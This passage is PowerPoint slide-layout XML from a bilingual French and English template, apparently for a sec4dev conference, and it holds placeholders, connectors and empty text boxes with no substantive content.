            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t>Date</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1760724" y="6021288"/>
            <a:ext cx="4580314" cy="360040"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="108000" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="177800" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="355600" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="541338" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="719138" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t>Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{228577E4-2C96-E9F1-D35A-D11DB03ECB9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8822453" y="6702251"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-FR" sz="1200" err="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93918356-A2B3-82D9-AB9F-31DF9081E787}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8621486" y="6702251"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-FR" sz="1200" err="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BE96314-9766-AB54-E258-DB989BDFB1DC}"/>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
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63E52A0D-A83D-99C3-2F6E-320682CD000B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8762163" y="6652009"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-FR" sz="1200" err="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Connecteur droit 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35C00389-E4F0-7C73-F613-88217D79FC3E}"/>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2" name="Connecteur droit 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A1E97ED-55E7-878C-7088-8AA1C37444FA}"/>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3" name="Connecteur droit 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21ED53CC-342F-9155-FE9B-61750155A307}"/>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4" name="Connecteur droit 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B206143A-5610-BA69-DB2C-4817EF7AC832}"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1887412C-F81B-6FCD-1C7C-D592727F3BEC}"/>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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70CE0C5C-7489-1A88-8A43-0F421D6E93C1}"/>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ZoneTexte 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51D522A0-006A-FA3B-39FC-3DBCDE12BB7E}"/>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18" name="ZoneTexte 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD7A83EF-BF60-B0A0-0DFF-40074B1C5A9C}"/>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19" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F32507E-DF2C-329E-A6E6-E334B8743C2E}"/>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0" name="Picture 2" descr="sec4dev (@sec4dev) / Twitter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D60157B-6BB8-CE38-2280-1B0A9F97B2F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AndAnswers">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110" y="1844825"/>
            <a:ext cx="3058969" cy="2995237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1417885" y="3166716"/>
            <a:ext cx="2743914" cy="351455"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" noProof="0">
                <a:solidFill>
                  <a:srgbClr val="5E6767"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cliquez pour modifier les styles du texte du masque</a:t>
            </a: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110" y="1844825"/>
            <a:ext cx="3058969" cy="2995237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0882C91E-A906-AD61-78D7-C0AF054A3672}"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="307593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2777091053"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1513" y="1589"/>
          <a:ext cx="1511"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8" name="Objec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 y="1589"/>
                        <a:ext cx="1511"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p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1760724" y="4596565"/>
            <a:ext cx="6925338" cy="587374"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" noProof="0"/>
              <a:t>Cliquez et modifiez le titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1760724" y="5255948"/>
            <a:ext cx="6925338" cy="477309"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="108000" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2000" i="1">
                <a:solidFill>
                  <a:srgbClr val="5E6A7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noProof="0"/>
              <a:t>Cliquez pour modifier le style des sous-titres du masque</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text Placeholder 31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1760724" y="5715720"/>
            <a:ext cx="4580314" cy="377577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="108000" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="177800" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="355600" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="541338" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="719138" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t>Date</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1760724" y="6021288"/>
            <a:ext cx="4580314" cy="360040"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="108000" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="177800" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="355600" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="541338" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="719138" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t>Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Object 7" hidden="1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2777091053"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1513" y="1589"/>
          <a:ext cx="1511" cy="1587"/>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10" name="Objec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 y="1589"/>
                        <a:ext cx="1511"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26" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19896A94-EAFA-1DF0-8C8E-8747A9962486}"/>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r="52527"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="90435" y="0"/>
            <a:ext cx="4340888" cy="45720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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AF588E7-137B-30E1-8E19-FCFCC32F378B}"/>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18" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FEC0BD6-3C34-0973-FAB4-25567AF4FDF0}"/>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11"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4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sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403141" y="1473116"/>
            <a:ext cx="8503057" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="520700" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="698500" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="884238" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1062038" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:lvl5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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titre 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="456520" y="274638"/>
            <a:ext cx="8230961" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Cliquez et modifiez le titre</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Connecteur droit 11"/>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AA142A4-A218-608E-D2CB-FC1BD4FA05C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8762163" y="6652009"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-FR" sz="1200" err="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Connecteur droit 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DF027A8-3913-A83D-3EA3-3DD075381FB7}"/>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5" name="Connecteur droit 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E67DD9C2-5CE5-C752-CA6A-17F9F5EF730C}"/>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7" name="Connecteur droit 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A70EAD1C-C190-B378-562F-76CD3326E4EF}"/>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8" name="Connecteur droit 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{777445F2-25DB-A741-618F-7A45361284DA}"/>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11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC9947A7-8158-BC52-B899-80111319426A}"/>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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F76A9039-98BC-1892-D03F-EFF44B60E417}"/>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ZoneTexte 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58089EDC-E502-836E-FA7F-122401A708C0}"/>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18" name="ZoneTexte 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F368015-D261-0CEA-1525-D7721572FEB5}"/>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19" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD7850FE-98A2-9F9F-83D7-A404DA88C5BD}"/>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0" name="Picture 2" descr="sec4dev (@sec4dev) / Twitter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05130E05-5580-6F03-BDBE-744B0E1CA1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09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divider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2"/>
            <a:ext cx="7772400" cy="1362075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4000" b="1" cap="none" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t>Click to edit master title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722313" y="2906713"/>
            <a:ext cx="7772400" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="72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dirty="0"/>
              <a:t>Number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="733657" y="4402667"/>
            <a:ext cx="77719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10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="733657" y="4402667"/>
            <a:ext cx="77719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813E656-8C14-6FA0-0CB1-1A74EECD5062}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8802356" y="6742444"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-FR" sz="1200" err="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{927C3CF9-5C26-39A0-7647-7137BCDAA3C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8480809" y="6702250"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-FR" sz="1200" err="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E00BC2C-2D7C-2940-0A1D-F284576AD385}"/>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8" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418730" y="188640"/>
            <a:ext cx="8503057" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" noProof="0"/>
              <a:t>Cliquez et modifiez le titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11"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4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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Connecteur droit 5"/>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 name="Connecteur droit 12">
            <a:extLst>
